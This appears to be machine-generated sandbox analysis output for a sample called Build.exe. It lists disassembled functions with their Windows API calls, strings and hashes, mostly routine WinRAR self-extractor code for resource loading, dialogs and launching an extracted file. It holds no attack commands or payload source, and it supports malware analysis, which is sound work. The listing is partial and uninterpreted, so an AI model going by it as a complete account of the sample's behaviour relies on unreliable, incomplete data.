Opcode ID: ab1750be4f4c158b7394221bb837a0e1380cddedf91d0754b37bee16ae601a5f
Instruction ID: d230d114b8989b61e6ea3af723b08285db37420c3d189f20c11e0f11ce788ff2
Opcode Fuzzy Hash: ab1750be4f4c158b7394221bb837a0e1380cddedf91d0754b37bee16ae601a5f
Instruction Fuzzy Hash: B7710371504300ABD333BB65EC4AF6B7AACFB46744F00841AF549D62A2DF3A9948CB61

Function 0037C652 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0037DA3D,00000066), ref: 0037C665
SizeofResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C67C
LoadResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C693
LockResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C6A2
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6BD
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6CE
GlobalUnlock.KERNEL32(00000000), ref: 0037C756

Part of subcall function 0037C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0037C5BC

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037C737
GlobalFree.KERNEL32(00000000), ref: 0037C75D

Strings

FjuK8, xrefs: 0037C6F2
PNG, xrefs: 0037C656

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: FjuK8$PNG
API String ID: 541704414-3760884945
Opcode ID: 91702d821ddf63dcfd7f36de150681cdfc1238a1165c61995b52c3e9194b0719
Instruction ID: 82dc30219507cdeb12e4d719f1b49221b26c54dc22f6e6caaf3f35046d9d1db8
Opcode Fuzzy Hash: 91702d821ddf63dcfd7f36de150681cdfc1238a1165c61995b52c3e9194b0719
Instruction Fuzzy Hash: F3317E71201702AFD7269F21EC89D1B7FACEF85751B05452AF90A92261EF36D800CFA0

Function 0036F963 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 684COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800,92C77967), ref: 0036F9CD

Part of subcall function 0036E208: _wcslen.LIBCMT ref: 0036E210

Part of subcall function 00372663: _wcslen.LIBCMT ref: 00372669

Part of subcall function 00373D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,92C77967,?,?,92C77967,00000001,0036DA04,00000000,92C77967,?,0001048A,?,?), ref: 00373D2C

_wcslen.LIBCMT ref: 0036FD00
__fprintf_l.LIBCMT ref: 0036FE50

Strings

,, xrefs: 0036FE8B
|l9, xrefs: 0036FCD1
*messages***, xrefs: 0036FB0A
*messages***, xrefs: 0036FAD1
$%s:, xrefs: 0036FE33
RTL, xrefs: 0036FE12
@%s:, xrefs: 0036FE3A, 0036FE46

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL$|l9
API String ID: 2646189078-2567830898
Opcode ID: c54a56fca3c582b97c6b8d2396f4266059c793f7c0eac800e34ee9cc3adcbd48
Instruction ID: 89f41e6d93b9d38ec5a5c3802dcba611bea221114ae8a69fa5beb1d9019eaa87
Opcode Fuzzy Hash: c54a56fca3c582b97c6b8d2396f4266059c793f7c0eac800e34ee9cc3adcbd48
Instruction Fuzzy Hash: F1420371900319EFCF36EFA4D841AEEB3B4FF08710F51802AE909AB285EB755A41CB54

Function 0036C4A8 Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000), ref: 0036C4E6

Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59

FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?), ref: 0036C516
GetLastError.KERNEL32(?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A), ref: 0036C522
FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000), ref: 0036C549
GetLastError.KERNEL32(?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0036C555

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 6726c03091f685b7810cbd4142fa68fa4f7108179e80b91e4052de0e41ad5a42
Instruction ID: d5ff82575ba5d78f8711b976a00cfb75c7ccdfef736baa6689026dd58c66faed
Opcode Fuzzy Hash: 6726c03091f685b7810cbd4142fa68fa4f7108179e80b91e4052de0e41ad5a42
Instruction Fuzzy Hash: D54192B1608741AFC725EF25C885AEAF3ECBB89340F004A1EF5DAD3240D735A954CBA1

Function 0038A640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002,00000000), ref: 0038A661
TerminateProcess.KERNEL32(00000000,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002,00000000), ref: 0038A668
ExitProcess.KERNEL32 ref: 0038A67A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e934266d7de9c6bff6d36afa84e51a6566b3098623f8ad4d4886b6d3aab74f3f
Instruction ID: 3454cd7507ace61c02892aace2b8dffed63643e140eb046d3e452a14c2154f39
Opcode Fuzzy Hash: e934266d7de9c6bff6d36afa84e51a6566b3098623f8ad4d4886b6d3aab74f3f
Instruction Fuzzy Hash: D8E0B631441A08AFDF137F64DD4AA483B6AEB50741F054456F8098A236EB36ED42CB95

Function 0037290A Relevance: 101.8, APIs: 23, Strings: 35, Instructions: 327
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00372937
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00372949
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00372973
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00372C1D
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00372C37
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00372C4B
ReadFile.KERNEL32(00000000,?,00007FFE,$o9,00000000), ref: 00372C69
CloseHandle.KERNEL32(00000000), ref: 00372CCD
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00372CE6
CompareStringW.KERNEL32(00000400,00001001,po9,?,DXGIDebug.dll,?,$o9,?,00000000,?,00000800), ref: 00372D3A
GetFileAttributesW.KERNELBASE(?,?,$o9,00000800,?,00000000,?,00000800), ref: 00372D64
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00372DA0

Part of subcall function 003728AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
Part of subcall function 003728AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4

_swprintf.LIBCMT ref: 00372E12
_swprintf.LIBCMT ref: 00372E5E
AllocConsole.KERNEL32 ref: 00372E66
GetCurrentProcessId.KERNEL32 ref: 00372E70
AttachConsole.KERNEL32(00000000), ref: 00372E77
_wcslen.LIBCMT ref: 00372E8C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00372E9D
WriteConsoleW.KERNEL32(00000000), ref: 00372EA4
Sleep.KERNEL32(00002710), ref: 00372EAF
FreeConsole.KERNEL32 ref: 00372EB5
ExitProcess.KERNEL32 ref: 00372EBD

Strings

Dq9, xrefs: 00372A61
xr9, xrefs: 00372ADC
xt9, xrefs: 00372BC3
xs9, xrefs: 00372B55
@p9, xrefs: 00372A09
kernel32, xrefs: 0037292D
SetDefaultDllDirectories, xrefs: 0037296D
dwmapi.dll, xrefs: 003729D9, 00372DD5
$o9, xrefs: 00372C56, 00372C5A
\q9, xrefs: 00372A69
Dt9, xrefs: 00372BAD
(p9, xrefs: 00372A01
pp9, xrefs: 00372A19
Xp9, xrefs: 00372A11
p9, xrefs: 00372A41
<r9, xrefs: 00372AC6
Ls9, xrefs: 00372B3F
DXGIDebug.dll, xrefs: 00372D26
po9, xrefs: 00372D2C
$r9, xrefs: 00372ABB
<, xrefs: 00372D3A
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00372E4C
uxtheme.dll, xrefs: 00372DDF
Xo9, xrefs: 003729B6
ds9, xrefs: 00372B4A
`r9, xrefs: 00372AD1
,q9, xrefs: 00372A59
4s9, xrefs: 00372B34
\t9, xrefs: 00372BB8
(t9, xrefs: 00372BA2
SetDllDirectoryW, xrefs: 00372943
tq9, xrefs: 00372A71
<o9, xrefs: 003729AE
o9, xrefs: 003729E9
$s9, xrefs: 00372B29

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
String ID: $o9$$r9$$s9$(p9$(t9$,q9$4s9$<$<o9$<r9$@p9$DXGIDebug.dll$Dq9$Dt9$Ls9$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$Xo9$Xp9$\q9$\t9$`r9$ds9$dwmapi.dll$kernel32$po9$pp9$tq9$uxtheme.dll$xr9$xs9$xt9$o9$p9
API String ID: 270162209-1907203880
Opcode ID: d97568c1774ceb3adeec9583e441532c359fc116833c8dfe6efe092befc33e7a
Instruction ID: e8d84973be4aa3d184c3cf60e4ea7f3ac298479fce9a3446474c6748ba5ad8ce
Opcode Fuzzy Hash: d97568c1774ceb3adeec9583e441532c359fc116833c8dfe6efe092befc33e7a
Instruction Fuzzy Hash: 7CD1A0B501D3859BDB339F50D889BDFBBECAB85304F00491DF5899A291CBB58548CBA2

Function 0037DAE0 Relevance: 97.0, APIs: 47, Strings: 8, Instructions: 750windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037DC06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037DC24
IsDialogMessageW.USER32(?,?), ref: 0037DC37
TranslateMessage.USER32(?), ref: 0037DC45
DispatchMessageW.USER32(?), ref: 0037DC4F
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0037DC72
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0037DC95
GetDlgItem.USER32(?,00000068), ref: 0037DCB8
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037DCD3
SendMessageW.USER32(00000000,000000C2,00000000,003965F4), ref: 0037DCE6

Part of subcall function 0037F77B: _wcslen.LIBCMT ref: 0037F7A5

SetFocus.USER32(00000000), ref: 0037DCED
_swprintf.LIBCMT ref: 0037DD4C

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0037DDAF
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0037DDD7
GetTickCount.KERNEL32 ref: 0037DDF5
_swprintf.LIBCMT ref: 0037DE0D
GetLastError.KERNEL32(?,00000011), ref: 0037DE3F
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0037DE92
_swprintf.LIBCMT ref: 0037DEC9
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,003B3482,00000200), ref: 0037DF1D
GetCommandLineW.KERNEL32(?,?,?,?,003B3482,00000200), ref: 0037DF33
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,003B3482,00000400,00000001,00000001,?,?,?,?,003B3482,00000200), ref: 0037DF8A
ShellExecuteExW.SHELL32(?), ref: 0037DFB2
Sleep.KERNEL32(00000064,?,?,?,?,003B3482,00000200), ref: 0037DFFA
UnmapViewOfFile.KERNEL32(?,?,0000421C,003B3482,00000400,?,?,?,?,003B3482,00000200), ref: 0037E023
CloseHandle.KERNEL32(?,?,?,?,?,003B3482,00000200), ref: 0037E02C
_swprintf.LIBCMT ref: 0037E05F
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E0BE
SetDlgItemTextW.USER32(?,00000065,003965F4), ref: 0037E0D5
GetDlgItem.USER32(?,00000065), ref: 0037E0DE
GetWindowLongW.USER32(00000000,000000F0), ref: 0037E0ED
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0037E0FC
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E1A9
_wcslen.LIBCMT ref: 0037E1FF
_swprintf.LIBCMT ref: 0037E229
SendMessageW.USER32(?,00000080,00000001,0002048D), ref: 0037E273
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0037E28D
GetDlgItem.USER32(?,00000068), ref: 0037E296
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0037E2AC
GetDlgItem.USER32(?,00000066), ref: 0037E2C6
SetWindowTextW.USER32(00000000,003B589A), ref: 0037E2E8
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0037E348
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E35B
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0037E3FE
EnableWindow.USER32(00000000,00000000), ref: 0037E4CC
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0037E50E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E532

Strings

"%s"%s, xrefs: 0037E04E
__tmp_rar_sfx_access_check_%u, xrefs: 0037DDFC
C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe, xrefs: 0037E11E, 0037E2FE
%s, xrefs: 0037E219
-el -s2 "-d%s" "-sp%s", xrefs: 0037DEB8
STARTDLG, xrefs: 0037DB2D
LICENSEDLG, xrefs: 0037E3F3
winrarsfxmappingfile.tmp, xrefs: 0037DEF3

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3247240745-2056833982
Opcode ID: ee7cb0451380dac899f0180de8ad52e77a894687ad9e771c85a5ff0a876fe5ed
Instruction ID: 1a8de9100f9e380c6a0e1ffcf766c9b45cfe9ec79fe5f0e2e346c69977825ccd
Opcode Fuzzy Hash: ee7cb0451380dac899f0180de8ad52e77a894687ad9e771c85a5ff0a876fe5ed
Instruction Fuzzy Hash: 0C42B671944344BAEB33AB60DC4AFBE3B6CAB0AB04F05C055F649EA1D1DB7C5A44CB61

Function 0037F7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
Part of subcall function 0037D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
Part of subcall function 0037D864: IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
Part of subcall function 0037D864: TranslateMessage.USER32(?), ref: 0037D8A8
Part of subcall function 0037D864: DispatchMessageW.USER32(?), ref: 0037D8B2

GetDlgItem.USER32(00000068,003C3CF0), ref: 0037F81F
ShowWindow.USER32(00000000,00000005,?,?,0037D099,00000001,?,?,0037DAB9,003982F0,003C3CF0,003C3CF0,00001000,003A50C4,00000000,?), ref: 0037F844
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037F853
SendMessageW.USER32(00000000,000000C2,00000000,003965F4), ref: 0037F861
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037F87B
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037F895
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037F8D9
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037F8E4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037F8F7
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037F91E
SendMessageW.USER32(00000000,000000C2,00000000,0039769C), ref: 0037F92D

Strings

\, xrefs: 0037F885

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: a5f6c1aa62a98c28608752e0b73dc97f08cc60a84de0073bc640917078603f08
Instruction ID: 549ea19241d3b1fa03281d67bc74b3e44fe5eb271df9a133e260a4bf9312c512
Opcode Fuzzy Hash: a5f6c1aa62a98c28608752e0b73dc97f08cc60a84de0073bc640917078603f08
Instruction Fuzzy Hash: 7F31C1B1249700BFE312DF24DC4AF6B7BACFB46704F080919F9A1DA1E1D76569048BA6

Function 0037FAFC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0037FB35
ShellExecuteExW.SHELL32(?), ref: 0037FC78
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0037FCB0
GetExitCodeProcess.KERNEL32(?,?), ref: 0037FCEC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0037FD12
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0037FD78

Strings

.inf, xrefs: 0037FC34
.exe, xrefs: 0037FD1C

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 40ab67889d4058c671d0a3efc54b0a0130102e0e44d99a75c2f77a6801bb48a9
Instruction ID: 637dd2bba9aea7f7ccabf8b1e17f1ef7102d8b786d3cd9d466e039d1eef3a944
Opcode Fuzzy Hash: 40ab67889d4058c671d0a3efc54b0a0130102e0e44d99a75c2f77a6801bb48a9
Instruction Fuzzy Hash: A761B0711083849ED733AF64D840ABBBBE8BB84744F06C82EF9C8D7251D7799984CB52

Function 0038CFAB Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00387F99,00387F99,?,?,?,0038D1FC,00000001,00000001,62E85006), ref: 0038D005
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038D1FC,00000001,00000001,62E85006,?,?,?), ref: 0038D08B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038D185
__freea.LIBCMT ref: 0038D192

Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0

__freea.LIBCMT ref: 0038D19B
__freea.LIBCMT ref: 0038D1C0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: ef2a4d629537c644c599cefa558f1bacfc93e95ceb2ddc67417635c1707fc602
Instruction ID: ef72b7fe9f9d1699cb6b0a3ae90d13a0df065e90a5719aca2e834d99494b7be6
Opcode Fuzzy Hash: ef2a4d629537c644c599cefa558f1bacfc93e95ceb2ddc67417635c1707fc602
Instruction Fuzzy Hash: BA51C372610316ABEB26AE64CC45EBF77AAEF44710F1646A9FD06DA180DB34DC80C790

Function 0037CCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003728AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
Part of subcall function 003728AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4

OleInitialize.OLE32(00000000), ref: 0037CCF2
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037CD29
SHGetMalloc.SHELL32(003AC460), ref: 0037CD33

Strings

riched20.dll, xrefs: 0037CCE1
3To, xrefs: 0037CD0A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

